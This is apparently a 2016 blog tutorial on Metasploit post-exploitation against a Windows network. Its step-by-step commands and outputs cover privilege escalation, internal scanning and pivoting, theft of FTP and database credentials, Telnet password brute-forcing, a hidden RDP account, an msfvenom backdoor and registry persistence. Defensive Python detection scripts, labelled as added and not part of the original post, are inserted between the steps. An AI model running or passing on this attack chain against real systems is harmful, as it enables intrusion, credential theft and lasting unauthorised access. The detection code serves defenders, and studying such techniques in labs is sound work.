Post Exploitation Hacking Techniques

June 15, 2016 | Views: 17719


Hello there,

This is my first OP3N submission, and we’ll talk about post exploitation hacking techniques you can use after getting a meterpreter shell on a remote system.


You’ll see things like:

  1. Privilege Escalation
  2. Maintaining Access
  3. Data Harvesting
  4. Weak Password Cracking

NOTE: Don’t take this guide as standard methodology. The purpose is to show different “tips and tricks” you can use in post exploitation phases.



Start the Handler

We’re assuming we already have a backdoor installed on the remote system. Let’s have our handler running and waiting for remote connections:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4466
LPORT => 4466
msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler…
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( ->



Privilege Escalation

Now that we have our session, let’s run some privilege escalation commands to get higher privileges on the system:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid



Map the Network

An easy way to map the internal network is to run the arp_scanner module:

meterpreter > run arp_scanner -r
[*] ARP Scanning
[*] IP: MAC 00:50:56:b1:eb:b8
[*] IP: MAC 00:50:56:b1:eb:9a
[*] IP: MAC 00:50:56:b1:eb:dd
[*] IP: MAC 00:50:56:b1:eb:de
[*] IP: MAC 00:50:56:b1:eb:df
meterpreter >

As you can see, there are 5 hosts in total on the network.



Port Scan

Once we’ve listed all internal hosts, we need to run a TCP scan to check for open ports. That will also help us identify the role of each system inside the network. To do that, we first need to background our current session and run the TCP port scanner module:

meterpreter > background
[*] Backgrounding session 4…
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS
msf auxiliary(tcp) > run
[*] – TCP OPEN
[*] – TCP OPEN
[*] – TCP OPEN
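The ARP sweep and TCP scan above are exactly the kind of internal reconnaissance a network sensor can pick up. The following Python is an added example, not code from the original post: it runs a sliding window over constructed connection records (the tuple layout is this example's own assumption, not any tool's export format) and raises one alert per sender that asks about too many distinct IPs, and one per sender/host pair that touches too many distinct ports, while slow, spread-out requests stay below the threshold.

```python
"""Added example (not from the original post): detect an internal ARP sweep and
a TCP port scan from a sensor's point of view. Input records are constructed;
the (time, kind, src, dst, port) layout is this example's own assumption."""
from collections import defaultdict

WINDOW_SECONDS = 10        # how far back one sender's activity is counted
ARP_SWEEP_MIN_TARGETS = 4  # distinct IPs asked about by one sender
SCAN_MIN_PORTS = 5         # distinct ports tried against one host

# Constructed sample: (time, kind, src, dst, dst_port); ARP rows carry no port.
SAMPLE_EVENTS = [
    (0, "arp", "10.0.0.7", "10.0.0.1", None),      # one normal ARP request
    (0, "arp", "10.0.0.5", "10.0.0.1", None),      # 10.0.0.5 sweeps the subnet
    (1, "arp", "10.0.0.5", "10.0.0.2", None),
    (2, "arp", "10.0.0.5", "10.0.0.3", None),
    (3, "arp", "10.0.0.5", "10.0.0.4", None),
    (4, "arp", "10.0.0.5", "10.0.0.6", None),
    (20, "tcp", "10.0.0.5", "10.0.0.20", 21),      # then port-scans 10.0.0.20
    (21, "tcp", "10.0.0.5", "10.0.0.20", 23),
    (22, "tcp", "10.0.0.5", "10.0.0.20", 80),
    (23, "tcp", "10.0.0.5", "10.0.0.20", 135),
    (24, "tcp", "10.0.0.5", "10.0.0.20", 445),
    (25, "tcp", "10.0.0.5", "10.0.0.20", 3389),
    (30, "tcp", "10.0.0.7", "10.0.0.20", 80),      # normal web request
    (50, "arp", "10.0.0.9", "10.0.0.1", None),     # slow, spread-out ARPs:
    (100, "arp", "10.0.0.9", "10.0.0.2", None),    # each one falls outside the
    (150, "arp", "10.0.0.9", "10.0.0.3", None),    # window of the previous one,
    (200, "arp", "10.0.0.9", "10.0.0.4", None),    # so no alert is raised
]


def detect_sweeps(events, window=WINDOW_SECONDS,
                  arp_min=ARP_SWEEP_MIN_TARGETS, port_min=SCAN_MIN_PORTS):
    """Return one (alert_type, offender, distinct_count) per offender.

    A sliding window per sender (ARP) or per sender->host pair (TCP) keeps only
    recent targets; an alert fires the first time the distinct count reaches
    the threshold, and never again for the same offender.
    """
    recent = defaultdict(list)   # key -> [(time, target), ...] inside window
    alerted = set()
    alerts = []
    for t, kind, src, dst, port in sorted(events, key=lambda e: e[0]):
        if kind == "arp":
            key, target, threshold = ("arp_sweep", src), dst, arp_min
        elif kind == "tcp":
            key, target, threshold = ("port_scan", f"{src}->{dst}"), port, port_min
        else:
            continue  # other record kinds are ignored
        bucket = [(ts, tg) for ts, tg in recent[key] if t - ts <= window]
        bucket.append((t, target))
        recent[key] = bucket
        distinct = {tg for _, tg in bucket}
        if len(distinct) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((key[0], key[1], len(distinct)))
    return alerts


if __name__ == "__main__":
    for alert in detect_sweeps(SAMPLE_EVENTS):
        print(alert)
```

The thresholds are deliberately low for the five-host lab network shown above; on a real segment you would tune them against a baseline of normal ARP and connection rates before alerting.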



Data Harvesting

There’s a chain of commands for this purpose and we’ll see a few of them.

Figure out installed applications

meterpreter > run post/windows/gather/enum_applications
[*] Enumerating applications installed on LS-WINXP
Installed Applications
FileZilla Client 3.5.3
Microsoft Visual C++ 2008 Redistributable – x86
Microsoft Visual C++ 2010 x86 Redistributable
Security Update for Windows XP (KB958644)
VMware Tools
WebFldrs XP
[*] Results stored in:
meterpreter >


We find FileZilla running on the system, and we already know that Metasploit has a module to get credentials from FTP software like FileZilla.

meterpreter > run post/multi/gather/filezilla_client_cred
[*] Checking for Filezilla directory in: C:\Documents and Settings\LSAdmin\Application Data
[*] Found C:\Documents and Settings\LSAdmin\Application Data\FileZilla
[*] Checking for Filezilla directory in: C:\Documents and Settings\Administrator\Application Data
[*] Reading sitemanager.xml and recentservers.xml files from C:\Documents and Settings\LSAdmin\Application Data\FileZilla
[*] Parsing sitemanager.xml
[*] Collected the following credentials:
[*] Server:
[*] Protocol: FTP
[*] Username: lsuser_ftp
[*] Password: FTPStrongPwd
[*] Parsing recentservers.xml
[*] Collected the following credentials:
[*] Server:
[*] Protocol: FTP
[*] Username: lsuser_ftp
[*] Password: FTPStrongPwd
meterpreter >

We also found a new host with the IP:
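The module above works because FileZilla's site manager keeps saved passwords in a file any process running as that user can read. As an added example (not from the original post), here is a defender-side audit of a sitemanager.xml that reports which saved sites carry a stored password and how it is stored, without ever printing the password itself. The XML is constructed; it uses the element names FileZilla writes (Host, Port, Protocol, User, Pass), and the Protocol number mapping covers only the FTP and SFTP cases shown here.

```python
"""Added example (not from the original post): audit a FileZilla sitemanager.xml
for saved passwords so they can be removed before someone harvests them.
The XML below is constructed; it follows FileZilla's element names, which is
the assumption this parser rests on."""
import xml.etree.ElementTree as ET

# FileZilla's Protocol numbers for the two cases shown in this example.
PROTOCOL_NAMES = {"0": "FTP", "1": "SFTP"}

SAMPLE_SITEMANAGER = """<FileZilla3>
  <Servers>
    <Server>
      <Host>ftp.intranet.example</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>lsuser_ftp</User>
      <Pass>FTPStrongPwd</Pass>
      <Name>Intranet FTP</Name>
    </Server>
    <Server>
      <Host>sftp.intranet.example</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>backup</User>
      <Pass encoding="base64">U2VjcmV0UGFzcw==</Pass>
      <Name>Backup SFTP</Name>
    </Server>
    <Server>
      <Host>ftp.vendor.example</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>vendor</User>
      <Name>Vendor FTP (ask each time)</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def audit_sitemanager(xml_text):
    """Return one finding per saved site: what is stored and why it matters.

    Passwords are never copied into the output; only whether one is stored
    and how. Base64 is reversible, so it is obfuscation, not protection.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        if pass_el is None or not (pass_el.text or "").strip():
            storage = "none"
        elif pass_el.get("encoding") == "base64":
            storage = "base64"
        else:
            storage = "plaintext"
        protocol = PROTOCOL_NAMES.get(server.findtext("Protocol", ""), "other")
        risk = []
        if storage != "none":
            risk.append("password readable by any process running as this user")
        if protocol == "FTP":
            risk.append("FTP sends the password unencrypted on the wire")
        findings.append({
            "name": server.findtext("Name", ""),
            "host": server.findtext("Host", ""),
            "protocol": protocol,
            "user": server.findtext("User", ""),
            "storage": storage,
            "risk": risk,
        })
    return findings


if __name__ == "__main__":
    for f in audit_sitemanager(SAMPLE_SITEMANAGER):
        print(f"{f['name']}: {f['protocol']} {f['user']}@{f['host']} "
              f"password stored: {f['storage']}")
        for r in f["risk"]:
            print("   -", r)
```

Run this against each user profile's FileZilla directory (the same paths the module above searched) and you get a list of stored credentials to rotate and remove; newer FileZilla releases can protect the file with a master password, and SFTP with key authentication avoids storing a password at all.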



Exploit the Server

In the previous step, we discovered a new host with IP: running an FTP service. Before getting more info about it, let’s try to connect to this system by creating an RDP user. For that, we have to interact with our running meterpreter shell and create a new RDP user. Plus, we have to start the RDP service on the remote system.

meterpreter > shell
Process 1100 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\LSAdmin> net user guest_1 guestpwd /add
net user guest_1 guestpwd /add
C:\Documents and Settings\LSAdmin> net localgroup "Remote Desktop Users" guest_1 /add
net localgroup "Remote Desktop Users" guest_1 /add
The command completed successfully.
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Carlos Perez
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it...
[*] For cleanup use command: run multi_console_command -rc
meterpreter >

We can log in to it with:
root@kali:~# rdesktop -u guest_1
After the RDP connection is established, you’ll also be asked for the password.
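Everything done in that shell session leaves a trail in the Windows event logs: a local account is created, it is added to the Remote Desktop Users group, the Terminal Services start type changes and fDenyTSConnections flips to 0. As an added example (not from the original post), this Python correlates constructed event records into one alert using the event ids of Windows Vista and later: Security 4720 (user account created), 4732 (member added to a security-enabled local group), 4657 (registry value modified, which only appears when object auditing is enabled on the Terminal Server key) and System 7040 (service start type changed). Windows XP, the target above, used different id numbers. The dictionary field names are this example's own assumption, not any log exporter's schema.

```python
"""Added example (not from the original post): correlate Windows events that
together mean "a fresh account was given RDP access and RDP was switched on".
Event records are constructed; their field names are an assumption."""
from collections import defaultdict

RDP_GROUPS = {"Remote Desktop Users", "Administrators"}
CORRELATION_WINDOW = 300  # seconds between related events to count as one action

# Constructed sample events; field names are this example's own, not a log schema.
SAMPLE_EVENTS = [
    {"time": 50, "host": "HR-PC01", "id": 4732, "account": "jdoe",
     "group": "Remote Desktop Users", "actor": "helpdesk"},       # routine change
    {"time": 1000, "host": "LS-WINXP", "id": 4720, "account": "guest_1",
     "actor": "LSAdmin"},                                          # net user /add
    {"time": 1003, "host": "LS-WINXP", "id": 4732, "account": "guest_1",
     "group": "Remote Desktop Users", "actor": "LSAdmin"},         # net localgroup
    {"time": 1010, "host": "LS-WINXP", "id": 4657,
     "object": r"\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server",
     "value_name": "fDenyTSConnections", "new_value": 0, "actor": "LSAdmin"},
    {"time": 1012, "host": "LS-WINXP", "id": 7040, "service": "Terminal Services",
     "start_type": "auto start", "actor": "LSAdmin"},
    {"time": 1020, "host": "LS-WINXP", "id": 4624, "account": "guest_1",
     "logon_type": 10},                                            # ignored here
]


def classify(event):
    """Map one raw event to a tagged observation, or None if irrelevant."""
    eid = event["id"]
    if eid == 4720:
        return ("account_created", event["account"])
    if eid == 4732 and event.get("group") in RDP_GROUPS:
        return ("rdp_group_add", event["account"])
    if (eid == 4657 and event.get("value_name") == "fDenyTSConnections"
            and event.get("new_value") == 0):
        return ("rdp_enabled", "registry")
    if eid == 7040 and event.get("service") in ("Terminal Services", "TermService"):
        return ("rdp_enabled", "service")
    return None


def correlate(events, window=CORRELATION_WINDOW):
    """Return alerts as (severity, host, description) tuples.

    Adding any account to an RDP-capable group is at least "medium"; doing it
    to an account created moments earlier is "high"; doing both while RDP is
    being enabled on the same host is "critical".
    """
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        obs = classify(ev)
        if obs:
            by_host[ev["host"]].append((ev["time"], obs[0], obs[1]))
    alerts = []
    for host, obs in by_host.items():
        created = {name: t for t, kind, name in obs if kind == "account_created"}
        rdp_added = {name: t for t, kind, name in obs if kind == "rdp_group_add"}
        enabled = [t for t, kind, _ in obs if kind == "rdp_enabled"]
        for name, t_add in rdp_added.items():
            t_new = created.get(name)
            fresh = t_new is not None and 0 <= t_add - t_new <= window
            rdp_on = any(abs(te - t_add) <= window for te in enabled)
            if fresh and rdp_on:
                alerts.append(("critical", host,
                               f"new account {name} granted RDP and RDP enabled"))
            elif fresh:
                alerts.append(("high", host,
                               f"new account {name} added to RDP-capable group"))
            else:
                alerts.append(("medium", host, f"{name} added to RDP-capable group"))
    return alerts


if __name__ == "__main__":
    for severity, host, text in correlate(SAMPLE_EVENTS):
        print(f"[{severity}] {host}: {text}")
```

The same chain can be watched at the source: the `net user` and `net localgroup` commands above run as child processes of the injected shell, so process-creation logging (Security 4688 with command-line auditing, or Sysmon) catches them even where account auditing is off.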



Port Scan

Let’s run a TCP scan on the server to check further for open ports. To do that, we first need to add a route to the machine: we have to use victim 1 as a bridge (pivot).

meterpreter > run autoroute -s
[*] Adding a route to…
[+] Added route to via
[*] Use the -p option to list all active routes
meterpreter >

Now, we can run our scanner module:

meterpreter > background
[*] Backgrounding session 2…
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS
msf auxiliary(tcp) > run
[*] – TCP OPEN
[*] – TCP OPEN
[*] – TCP OPEN
[*] – TCP OPEN
[*] – TCP OPEN
[*] – TCP OPEN
…



Web Server

Previously, we found a web server running on the intranet. We’ll forward its port to our machine so we can access the site:

meterpreter > portfwd add -l 8001 -p 80 -r
[*] Local TCP relay created: <->
meterpreter >

We should now be able to access the internal web site by visiting http://localhost:8001 in a browser.



Weak Password Cracking

In the previous tasks, we also found port 23 open on the system. Even without service detection, we can figure out there’s probably a Telnet service listening. Let’s try to crack the password using the telnet_login auxiliary module:

msf auxiliary(tcp) > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set RHOSTS
msf auxiliary(telnet_login) > set PASS_FILE /root/Desktop/pwd.txt
PASS_FILE => /root/Desktop/pwd.txt
msf auxiliary(telnet_login) > set USER_FILE /root/Desktop/username.txt
USER_FILE => /root/Desktop/username.txt
msf auxiliary(telnet_login) > set THREADS 15
msf auxiliary(telnet_login) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(telnet_login) > set STOP_ON_SUCCESS true
msf auxiliary(telnet_login) > exploit

[*] TELNET – [00009/10000] – Banner: Welcome to Microsoft Telnet Service login:
[*] TELNET – [00009/10000] – Prompt: netadmin password:
[*] TELNET – [00009/10000] – Result: The handle is invalid. Login Failed login:
[*] Telnet – [00010/10000] – Attempting:
[*] TELNET – [00010/10000] – Banner: Welcome to Microsoft Telnet Service login:
[*] TELNET – [00010/10000] – Prompt: netadmin password:
[*] TELNET – [00010/10000] – Result: The handle is invalid. Login Failed login:
[*] Telnet – [00011/10000] – Attempting:
[*] TELNET – [00011/10000] – Banner: Welcome to Microsoft Telnet Service login:
[*] TELNET – [00011/10000] – Prompt: netadmin password:
[*] TELNET – [00011/10000] – Result: Microsoft Telnet Server.
[+] – SUCCESSFUL LOGIN netadmin : abc123
[*] Attempting to start session with netadmin:abc123
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)
[*] Auxiliary module execution completed
msf auxiliary(telnet_login) >
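A run of 10,000 guesses against one account is loud on the server side. The following Python is an added example, not from the original post: it reads the Telnet service's own authentication log, counts failures per source address in a sliding window, and raises a second, more urgent alert when a success follows such a run, which is the moment above where netadmin:abc123 went through. The log lines are constructed in a simple "epoch telnetd: ..." layout; a real server's format is an assumption you would adapt the regex to.

```python
"""Added example (not from the original post): detect password guessing against
a Telnet service from its authentication log, and flag a successful login that
follows a burst of failures. Log lines are constructed; the format is assumed."""
import re
from collections import defaultdict, deque

FAIL_THRESHOLD = 5   # failures from one source inside the window -> alert
WINDOW_SECONDS = 60

LOG_RE = re.compile(
    r"^(?P<ts>\d+) telnetd: login (?P<result>failed|succeeded) "
    r"for user '(?P<user>[^']+)' from (?P<src>[\d.]+)$"
)

SAMPLE_LOG = """\
50 telnetd: login failed for user 'jdoe' from 10.0.0.8
52 telnetd: login failed for user 'jdoe' from 10.0.0.8
55 telnetd: login succeeded for user 'jdoe' from 10.0.0.8
this line is in another format and is skipped
100 telnetd: login failed for user 'netadmin' from 10.0.0.5
101 telnetd: login failed for user 'netadmin' from 10.0.0.5
102 telnetd: login failed for user 'netadmin' from 10.0.0.5
103 telnetd: login failed for user 'netadmin' from 10.0.0.5
104 telnetd: login failed for user 'netadmin' from 10.0.0.5
105 telnetd: login failed for user 'netadmin' from 10.0.0.5
106 telnetd: login succeeded for user 'netadmin' from 10.0.0.5
400 telnetd: login failed for user 'netadmin' from 10.0.0.5
"""


def analyze_auth_log(log_text, threshold=FAIL_THRESHOLD, window=WINDOW_SECONDS):
    """Return alerts as tuples.

    ("brute_force", src, failures)  once a source reaches the threshold
    ("guessed_login", src, user)    when a success follows such a run; this is
                                    the event that needs an immediate response
    """
    recent_failures = defaultdict(deque)  # src -> timestamps inside the window
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue                       # lines in other formats are ignored
        t, src, user = int(m["ts"]), m["src"], m["user"]
        q = recent_failures[src]
        while q and t - q[0] > window:     # expire failures outside the window
            q.popleft()
        if m["result"] == "failed":
            q.append(t)
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("brute_force", src, len(q)))
        else:
            if len(q) >= threshold:
                alerts.append(("guessed_login", src, user))
            q.clear()                      # a success ends the current run
            flagged.discard(src)           # a later run from this source re-alerts
    return alerts


if __name__ == "__main__":
    for alert in analyze_auth_log(SAMPLE_LOG):
        print(alert)
```

Two normal failures followed by a success (the jdoe lines) produce nothing, so the rule does not fire on ordinary typos. Beyond detection, the fix for the weakness the module exploits is simple: Telnet transmits credentials in clear text, so the service should be disabled or replaced and the account given a lockout policy.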



Uploading a Backdoor

* Create a backdoor

root@kali:~# cd /pentest/exploits/framework3/
root@kali:/pentest/exploits/framework3# ./msfvenom windows/meterpreter/bind_tcp LPORT=2444 X > /root/Desktop/msf_bind.exe
Created by msfpayload (
Payload: windows/meterpreter/bind_tcp
Length: 298
Options: {“LPORT”=>”2444”}

Upload it to the remote system and execute it through telnet (as we have the credentials):

meterpreter > upload /root/Desktop/msf_bind.exe 'C:\Documents and Settings\LSAdmin\Local Settings\Temp\msf_bind.exe'
[*] uploading : /root/Desktop/msf_bind.exe -> C:\Documents and Settings\LSAdmin\Local Settings\Temp\msf_bind.exe
[*] uploaded  : /root/Desktop/msf_bind.exe -> C:\Documents and Settings\LSAdmin\Local Settings\Temp\msf_bind.exe
meterpreter >

Run the backdoor using the Telnet session

msf auxiliary(telnet_login) > sessions -i 2
[*] Starting interaction with 2…
C:\>cd inetpub
cd inetpub
C:\inetpub>cd ftproot
cd ftproot

Next, we set up a new handler and wait for connections:

msf auxiliary(tcp) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST
msf exploit(handler) > set LPORT 2444
LPORT => 2444
msf exploit(handler) > exploit
[*] Starting the payload handler…
[*] Started bind handler
[*] Sending stage (752128 bytes)
[*] Meterpreter session 4 opened ( ->
meterpreter >



Privilege Escalation

NOTE: Don’t forget: the first thing you want to do after gaining access to a remote system is to escalate your privileges (after migration, of course). Let’s run it one more time:

meterpreter > getsystem
…got system (via technique 4).
meterpreter > getuid
meterpreter >



Maintaining Access

Getting just high privileges isn’t enough, right? Let’s add a value in the registry in order to run our backdoor on startup so we can access the system any time we want:

meterpreter > reg setval -k  -d '"C:\inetpub\ftproot\msf_bind.exe"' -v msf_bind
Successful set msf_bind.
meterpreter >
Here -k is the registry key path, -d the data stored in the value (the path of our backdoor) and -v the value name.
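A Run-key entry like the one above is easy to spot in an export of the autostart keys: legitimate entries point into Program Files or the Windows directory, while this one points into an FTP root. The following Python is an added example, not from the original post: it parses a constructed .reg export in the format reg.exe writes, pulls the program path out of each Run value (quoted or unquoted command lines), and reports entries whose program lives outside a list of trusted roots, which is an assumption to adjust per build.

```python
r"""Added example (not from the original post): audit a .reg export of the Run
keys for autostart programs outside the normal program directories.
The export text is constructed in reg.exe's format; TRUSTED_ROOTS is an
assumption to tune per build."""
import re

TRUSTED_ROOTS = (r"c:\program files", r"c:\windows")

# Constructed .reg export: one legitimate entry and two suspicious ones.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""
"msf_bind"="\"C:\\inetpub\\ftproot\\msf_bind.exe\""

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"updater"="C:\\Documents and Settings\\LSAdmin\\Local Settings\\Temp\\svchost.exe -k"
'''

# "name"="data" with .reg escaping (\\ for backslash, \" for a quote)
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def unescape(s):
    r"""Undo .reg escaping: \\ becomes \ and \" becomes " ."""
    return re.sub(r"\\(.)", r"\1", s)


def executable_path(command):
    """Extract the program path from an autostart command line."""
    command = command.strip()
    if command.startswith('"'):                 # quoted path, possibly with args
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    pos = command.lower().find(".exe")          # unquoted path that may contain spaces
    return command[:pos + 4] if pos >= 0 else command.split(" ")[0]


def parse_reg(text):
    """Yield (key, value_name, data) for every string value in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if key and m:
            yield key, unescape(m.group(1)), unescape(m.group(2))


def audit_run_keys(text, trusted=TRUSTED_ROOTS):
    """Return findings for Run entries whose program is outside trusted roots."""
    findings = []
    for key, name, data in parse_reg(text):
        if not key.lower().endswith(r"\currentversion\run"):
            continue                            # only autostart keys are audited
        path = executable_path(data)
        if not path.lower().startswith(trusted):
            findings.append({"key": key, "name": name, "path": path,
                             "reason": "autostart program outside program/system directories"})
    return findings


if __name__ == "__main__":
    for f in audit_run_keys(SAMPLE_REG):
        print(f"{f['key']}\\{f['name']} -> {f['path']}: {f['reason']}")
```

On a live host the same check is done with `reg export` of the HKLM and HKCU Run and RunOnce keys, and the `reg setval` call above also shows up in Security event 4657 when auditing is enabled on the Run key.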



Data Harvesting

We know the system is running a web server and is probably connected to a database. Let’s find usernames and passwords for this site. The easiest way is to download the site’s config file and look through it:

meterpreter > ls
Listing: C:\inetpub\wwwroot\intranet

Mode              Size   Type  Name
----              ----   ----  ----
40777/rwxrwxrwx   0      dir   .
40777/rwxrwxrwx   0      dir   ..
100666/rw-rw-rw-  397    fil   index.php
100666/rw-rw-rw-  16899  fil   licence.txt
100666/rw-rw-rw-  9202   fil   readme.html
100666/rw-rw-rw-  3982   fil   wp-comments-post.php
100666/rw-rw-rw-  3165   fil   wp-config.php
100666/rw-rw-rw-  0      dir   wp-content

meterpreter > download wp-config.php /root/Desktop/conf.php
[*] downloading: wp-config.php -> /root/Desktop/conf.php/wp-config.php
[*] downloaded : wp-config.php -> /root/Desktop/conf.php/wp-config.php
meterpreter >


And, finally, the credentials we need:

DB NAME                  intranet
DB USER                   root
DB PASSWORD       LSMySqlDBPwd0905
DB HOST        
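The listing and config file above show two weaknesses that make the harvesting step trivial: every file in the document root is world-writable (rw-rw-rw-), and the site connects to the database as root. As an added example (not from the original post), the following Python audits a directory listing in the Mode/Size/Type/Name layout meterpreter prints and a wp-config.php for exactly those problems. Both inputs are constructed (the modes and the DB_HOST value are made up for the example and differ from the page's output), and the finding texts are this example's own.

```python
"""Added example (not from the original post): audit a web root listing and a
wp-config.php for world-writable files and an over-privileged database login.
Both sample inputs are constructed."""
import re

LISTING_RE = re.compile(
    r"^(?P<octal>\d+)/(?P<perm>[rwx-]{9})\s+(?P<size>\d+)\s+(?P<type>dir|fil)\s+(?P<name>.+)$"
)
DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<key>DB_\w+)['"]\s*,\s*['"](?P<val>[^'"]*)['"]\s*\)"""
)
SENSITIVE_FILES = {"wp-config.php", ".htaccess", ".env"}

SAMPLE_LISTING = """\
Mode              Size   Type  Name
----              ----   ----  ----
40777/rwxrwxrwx   0      dir   .
40777/rwxrwxrwx   0      dir   ..
100666/rw-rw-rw-  397    fil   index.php
100666/rw-rw-rw-  3165   fil   wp-config.php
100644/rw-r--r--  9202   fil   readme.html
40755/rwxr-xr-x   0      dir   wp-content
"""

SAMPLE_WPCONFIG = """\
<?php
define('DB_NAME', 'intranet');
define('DB_USER', 'root');
define('DB_PASSWORD', 'example-placeholder');
define('DB_HOST', '10.0.0.30');
"""


def audit_listing(listing):
    """Return (name, problem) pairs for risky entries in a document root."""
    findings = []
    for line in listing.splitlines():
        m = LISTING_RE.match(line.strip())
        if not m or m["name"] in (".", ".."):
            continue                       # header, separator and self entries
        perm, name = m["perm"], m["name"]
        if perm[7] == "w":                 # 'others' write bit
            findings.append((name, "world-writable in document root"))
        if name in SENSITIVE_FILES and perm[6] == "r":   # 'others' read bit
            findings.append((name, "sensitive file readable by everyone"))
    return findings


def audit_wpconfig(text):
    """Return (setting, problem) pairs for weak database settings."""
    conf = {m["key"]: m["val"] for m in DEFINE_RE.finditer(text)}
    findings = []
    if conf.get("DB_USER", "").lower() == "root":
        findings.append(("DB_USER",
                         "site connects as the database superuser; use a least-privilege account"))
    host = conf.get("DB_HOST", "")
    if host and host.split(":")[0] not in ("localhost", "127.0.0.1"):
        findings.append(("DB_HOST",
                         f"remote database {host}: these credentials reach another host"))
    if conf.get("DB_PASSWORD", "") == "":
        findings.append(("DB_PASSWORD", "empty password"))
    return findings


if __name__ == "__main__":
    for name, problem in audit_listing(SAMPLE_LISTING) + audit_wpconfig(SAMPLE_WPCONFIG):
        print(f"{name}: {problem}")
```

A database account scoped to the one schema the site needs, with the config file readable only by the web server's own account, turns a downloaded wp-config.php from a full database compromise into a much smaller problem.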


That’s it for now, folks. Hope you find this useful!




  1. Thank you. Most of this is also explained (and well explained) by Dean Pompilio in the “Metasploit” course on Cybrary.
